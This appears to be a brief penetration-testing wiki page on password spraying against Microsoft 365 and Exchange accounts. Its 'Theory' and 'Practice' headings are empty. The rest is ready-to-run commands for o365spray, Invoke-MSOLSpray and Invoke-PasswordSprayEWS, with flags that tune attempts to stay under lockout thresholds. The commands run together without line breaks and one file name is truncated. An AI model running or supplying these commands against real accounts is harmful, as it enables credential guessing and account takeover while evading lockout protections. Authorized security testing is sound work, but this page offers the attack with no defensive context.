Password Spraying
Theory
Practice
# --spray: Password Spray Mode
# -U: Userfile
# -P: password file
# -p password
# --count: Number of password attempt per user before resetting lockout timer
# --lockout: Lockout policy's reset time (in minutes).
# -d: Target domain
# --spray-module: activesync, adfs, autodiscover, autologon, oauth2, reporting, rst
python o365spray.py --spray -U usernames.txt -p passwords.tx --count 2 --lockout 5 --domain test.comInvoke-MSOLSpray -UserList valid-emails.txt -Password <PASSWORD> -VerboseInvoke-PasswordSprayEWS -ExchHostname outlook.office365.com -UserList valid-emails.txt -Password <PASSWORD>Resources
Last updated